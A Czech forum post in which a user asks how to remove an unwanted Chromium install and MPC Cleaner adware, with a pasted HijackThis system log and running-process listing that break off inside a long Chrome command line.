Chromium nelze odinstalovat

[boutek]

Ani nevim, kde se mi tam vzalo, ale kdyz ho zkousim odinstalovat v settings, tak to po stisknuti uninstal nereaguje a nic nedela. Taky se mi na plose objevil jakysi MPC cleaner, ktery mi obcas neco hlasi. Predem dekuji za pomoc.

Logfile of random's system information tool 1.10 (written by random/random)
Run by Administrator at 2016-04-15 21:07:54
Microsoft Windows 10 Home
System drive C: has 70 GB (30%) free of 238 GB
Total RAM: 3958 MB (44% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 21:08:00, on 15/04/2016
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.10586.0020)
Boot mode: Normal

Running processes:
C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
C:\Program Files (x86)\MPC Cleaner\MPCTray.exe
C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Users\Administrator\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Java\jre1.8.0_31\bin\javaw.exe
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE
C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
C:\Program Files\Alwil Software\Avast5\avastui.exe
C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files\trend micro\Administrator.exe
C:\Program Files (x86)\Java\jre1.8.0_31\bin\java.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local;<local>
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=
O1 - Hosts: ::1 localhost
O2 - BHO: Skype for Business Click to Call BHO - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll
O4 - HKLM\..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
O4 - HKLM\..\Run: [HWSetup] "C:\Program Files\TOSHIBA\Utilities\HWSetup.exe" hwSetUP
O4 - HKLM\..\Run: [KeNotify] C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
O4 - HKLM\..\Run: [TWebCamera] "C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe" autorun
O4 - HKLM\..\Run: [ToshibaServiceStation] "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
O4 - HKLM\..\Run: [AvastUI.exe] "C:\Program Files\Alwil Software\Avast5\AvastUI.exe" /nogui
O4 - HKLM\..\Run: [BtTray] "C:\Program Files (x86)\IVT Corporation\BlueSoleil\BtTray.exe"
O4 - HKLM\..\Run: [SwitchBoard] C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O4 - HKLM\..\Run: [AdobeCS6ServiceManager] "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
O4 - HKLM\..\Run: [DivXMediaServer] C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_361C1DD22E1256C6B68316A32E8B1949] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [Remote Mouse] C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files (x86)\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [Chromium] "c:\users\administrator\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
O4 - HKCU\..\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
O4 - HKCU\..\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1] C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1"
O4 - HKCU\..\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
O4 - HKCU\..\RunOnce: [Uninstall C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127] C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6301.0127"
O4 - HKUS\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (User 'NETWORK SERVICE')
O4 - .DEFAULT User Startup: TRDCReminder.lnk = C:\Program Files (x86)\TOSHIBA\TRDCReminder\TRDCReminder.exe (User 'Default user')
O4 - Startup: Dropbox.lnk = Administrator\AppData\Roaming\Dropbox\bin\Dropbox.exe
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE
O4 - Global Startup: AirStream-Suite.lnk = ?
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
O8 - Extra context menu item: Se&nd to OneNote - res://C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\Office15\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\Office15\ONBttnIE.dll
O9 - Extra button: Skype for Business Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll
O9 - Extra 'Tools' menuitem: Skype for Business Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\Office15\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\Office15\ONBttnIELinkedNotes.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MIF5BA~1\Office12\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: BlueSoleilCS - IVT Corporation - C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
O23 - Service: BsHelpCS - IVT Corporation - C:\Program Files (x86)\IVT Corporation\BlueSoleil\BsHelpCS.exe
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: DameWare NT Utilities 2.6 (DNTUS26) - Unknown owner - C:\Windows\SYSTEM32\DNTUS26.EXE (file missing)
O23 - Service: DameWare Mini Remote Control (dwmrcs) - SolarWinds - C:\Windows\dwrcs\DWRCS.EXE
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: MPC Core Protect Service (MPCProtectService) - DotC United Inc - C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @mqutil.dll,-6102 (MSMQ) - Unknown owner - C:\WINDOWS\system32\mqsvc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\WINDOWS\system32\nvvsvc.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: SynTPEnh Caller Service (SynTPEnhService) - Synaptics Incorporated - C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: TMachInfo - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Wondershare Driver Install Service (WsDrvInst) - Unknown owner - C:\Program Files (x86)\Wondershare\Dr.Fone for Android\DriverInstall.exe (file missing)

--
End of file - 14688 bytes

======Listing Processes======

[boutek]

C:\WINDOWS\system32\lsass.exe
winlogon.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
"dwm.exe"
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\system32\svchost.exe -k LocalService
"C:\WINDOWS\system32\nvvsvc.exe"
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
"C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe"
C:\WINDOWS\system32\nvvsvc.exe -session -first
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\svchost.exe -k NetworkService
"C:\Program Files\Alwil Software\Avast5\AvastSvc.exe"
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k apphost
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe"
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Windows\SYSTEM32\DNTUS26.EXE
C:\Windows\dwrcs\DWRCS.EXE -service
"C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe" /service
"C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe" /service
"C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe"
C:\WINDOWS\system32\svchost.exe -k iissvcs
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\WINDOWS\system32\mqsvc.exe
"C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe"
"C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe" /service
"C:\Program Files (x86)\IVT Corporation\BlueSoleil\BsHelpCS.exe"
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\WINDOWS\System32\svchost.exe -k LocalServicePeerNet
"C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe" -NetMsmqActivator
6129
"C:\Program Files\Synaptics\SynTP\SynTPEnh.exe"
sihost.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\WINDOWS\System32\LocationNotificationWindows.exe
"C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE"
C:\WINDOWS\Explorer.EXE
"C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe" -ServerName:SkypeHost.ServerServer
"C:\Program Files (x86)\MPC Cleaner\MPCTray.exe"
"C:\Program Files (x86)\MPC Cleaner\MPCTray64.exe"
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
C:\WINDOWS\system32\SearchIndexer.exe /Embedding
C:\WINDOWS\system32\SettingSyncHost.exe -Embedding
"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
"C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe"
"C:\Program Files\TOSHIBA\HDMICtrlMan\HDMICtrlMan.exe"
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
"C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"C:\Program Files (x86)\CCleaner\CCleaner.exe" /MONITOR /uac
"C:\Users\Administrator\AppData\Roaming\Dropbox\bin\Dropbox.exe" /systemstartup
"C:\Program Files (x86)\Java\jre1.8.0_31\bin\javaw.exe" -jar "C:\Program Files (x86)\AirStream-Suite\AirstreamSuite.jar"
"C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe"
"C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE" /tsr
"C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe"
"C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
"C:\Program Files\Alwil Software\Avast5\avastui.exe" /nogui
"fontdrvhost.exe"
C:\WINDOWS\system32\wbem\unsecapp.exe -Embedding
"C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE" "C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE" -Embedding
C:\WINDOWS\system32\wbem\wmiprvse.exe
"C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe"
C:\WINDOWS\sysWOW64\wbem\wmiprvse.exe -Embedding
C:\WINDOWS\system32\ApplicationFrameHost.exe -Embedding

"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
C:\WINDOWS\system32\msiexec.exe /V
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" search.mpc.am
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler /prefetch:7 --no-rate-limit "--database=C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel=m --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=49.0.2623.112 --handshake-handle=0x1b4
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --channel="9884.0.968781020\1008793908" --supports-dual-gpus=false --gpu-driver-bug-workarounds=3,11,25,54,64 --gpu-vendor-id=0x10de --gpu-device-id=0x0a29 --gpu-driver-vendor=NVIDIA --gpu-driver-version=9.18.13.4192 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,WebFontsIntervention<WebFontsIntervention --lang=en-GB --force-fieldtrials=AppBannerTriggering/Aggressive/AutofillProfileOrderByFrecency/Enabled/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/*ClientSideDetectionModel/Model0/*CrossDevicePromo/7DaySingleProfile/*DataReductionProxyConfigService/Enabled/*DirectWriteFontProxy/UseDirectWriteFontProxy/*ExtensionActionRedesign/Enabled/ExtensionDeveloperModeWarning/Enabled/*ExtensionInstallVerification/Enforce/*GFE/Default/InstanceID/Enabled/IntelligentSessionRestore/Enabled2/MaterialDesignDownloads/Enabled/*NetworkQualityEstimator/Enabled/*OmniboxBundledExperimentV1/Stable_EthersuggestPrefix_A3/PasswordBranding/Disabled/*PasswordGeneration/Disabled/PreRead/Default/*QUIC/EnabledNoId/ReportCertificateErrors/ShowAndPossiblySend/*ResourcePriorities/Launch50pct_11011_1_1_10/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/*SRTPromptFieldTrial/On/SSLCommonNameMismatchHandling/Disabled/*SafeBrowsingIncidentReportingService/Default/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/SafeBrowsingUpdateFrequency/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/*UMA-Uniformity-Trial-1-Percent/group_28/*UMA-Uniformity-Trial-10-Percent/group_03/*UMA-Uniformity-Trial-100-Percent/group_01/*UMA-Uniformity-Trial-20-Percent/group_02/*UMA-Uniformity-Trial-5-Percent/group_07/*UMA-Uniformity-Trial-50-Percent/default/*UseDelayAgnosticAEC/DefaultEnabled/WebFontsIntervention/Enabled/WebRTC-LocalIPPermissionCheck/Enabled/WebRTC-PeerConnectionDTLS1.2/Enabled/ --extension-process --enable-webrtc-hw-h264-encoding --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="9884.2.50800623\825881337" /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,WebFontsIntervention<WebFontsIntervention --lang=en-GB --force-fieldtrials=AppBannerTriggering/Aggressive/AutofillProfileOrderByFrecency/Enabled/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/*ClientSideDetectionModel/Model0/*CrossDevicePromo/7DaySingleProfile/*DataReductionProxyConfigService/Enabled/*DirectWriteFontProxy/UseDirectWriteFontProxy/*ExtensionActionRedesign/Enabled/ExtensionDeveloperModeWarning/Enabled/*ExtensionInstallVerification/Enforce/*GFE/Default/InstanceID/Enabled/IntelligentSessionRestore/Enabled2/MaterialDesignDownloads/Enabled/*NetworkQualityEstimator/Enabled/*OmniboxBundledExperimentV1/Stable_EthersuggestPrefix_A3/PasswordBranding/Disabled/*PasswordGeneration/Disabled/PreRead/Default/*QUIC/EnabledNoId/ReportCertificateErrors/ShowAndPossiblySend/*ResourcePriorities/Launch50pct_11011_1_1_10/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/*SRTPromptFieldTrial/On/SSLCommonNameMismatchHandling/Disabled/*SafeBrowsingIncidentReportingService/Default/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/SafeBrowsingUpdateFrequency/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA-Population-Restrict/normal/*UMA-Uniformity-Trial-1-Percent/group_28/*UMA-Uniformity-Trial-10-Percent/group_03/*UMA-Uniformity-Trial-100-Percent/group_01/*UMA-Uniformity-Trial-20-Percent/group_02/*UMA-Uniformity-Trial-5-Percent/group_07/*UMA-Uniformity-Trial-50-Percent/default/*UseDelayAgnosticAEC/DefaultEnabled/WebFontsIntervention/Enabled/WebRTC-LocalIPPermissionCheck/Enabled/WebRTC-PeerConnectionDTLS1.2/Enabled/ --extension-process --enable-webrtc-hw-h264-encoding --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --blink-settings=fetchDeferLateScripts=true,fetchIncreaseFontPriority=true,fetchIncreasePriorities=true --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="9884.3.1281674198\1514270221" /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --enable-features=AutomaticTabDiscarding<AutomaticTabDiscarding,UpdateRendererPriorityOnStartup<UpdateRendererPriorityOnStartup,WebFontsIntervention<WebFontsIntervention --lang=en-GB --force-fieldtrials=AppBannerTriggering/Aggressive/AutofillProfileOrderByFrecency/Enabled/*AutomaticTabDiscarding/Enabled_Once_10-gen2/CaptivePortalInterstitial/Enabled/ChildAccountDetection/Disabled/*ClientSideDetectionModel/Model0/*CrossDevicePromo/7DaySingleProfile/*DataReductionProxyConfigService/Enabled/*DirectWriteFontProxy/UseDirectWriteFontProxy/*ExtensionActionRedesign/Enabled/ExtensionDeveloperModeWarning/Enabled/*ExtensionInstallVerification/Enforce/*GFE/Default/InstanceID/Enabled/IntelligentSessionRestore/Enabled2/MaterialDesignDownloads/Enabled/*NetworkQualityEstimator/Enabled/*OmniboxBundledExperimentV1/Stable_EthersuggestPrefix_A3/PasswordBranding/Disabled/*PasswordGeneration/Disabled/PreRead/Default/*QUIC/EnabledNoId/ReportCertificateErrors/ShowAndPossiblySend/*ResourcePriorities/Launch50pct_11011_1_1_10/SHA1IdentityUIWarning/Enabled/SHA1ToolbarUIJanuary2016/Warning/SHA1ToolbarUIJanuary2017/Error/*SRTPromptFieldTrial/On/SSLCommonNameMismatchHandling/Disabled/*SafeBrowsingIncidentReportingService/Default/SafeBrowsingUnverifiedDownloads/DisableByParameterMostSbTypes2/SafeBrowsingUpdateFrequency/Default/*TriggeredResetFieldTrial/On/*UMA-Dynamic-Uniformity-Trial/Group3/*UMA